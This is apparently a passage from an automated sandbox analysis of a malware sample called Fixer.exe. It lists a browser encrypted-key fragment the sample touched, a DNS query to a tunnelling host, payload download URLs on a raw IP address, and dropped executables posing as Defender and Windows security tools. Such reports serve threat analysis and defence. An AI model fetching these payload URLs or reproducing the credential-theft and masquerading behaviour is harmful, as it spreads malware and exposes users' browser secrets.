19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
                      Source: global trafficDNS traffic detected: DNS query: et-seattle.gl.at.ply.gg
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911/6z9uno0baqvej0me.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911/FixerNerest.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0$
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://s.symcd.com06
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53588979577.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000016.00000002.52919814800.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000018.00000002.53436833869.0000000002979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
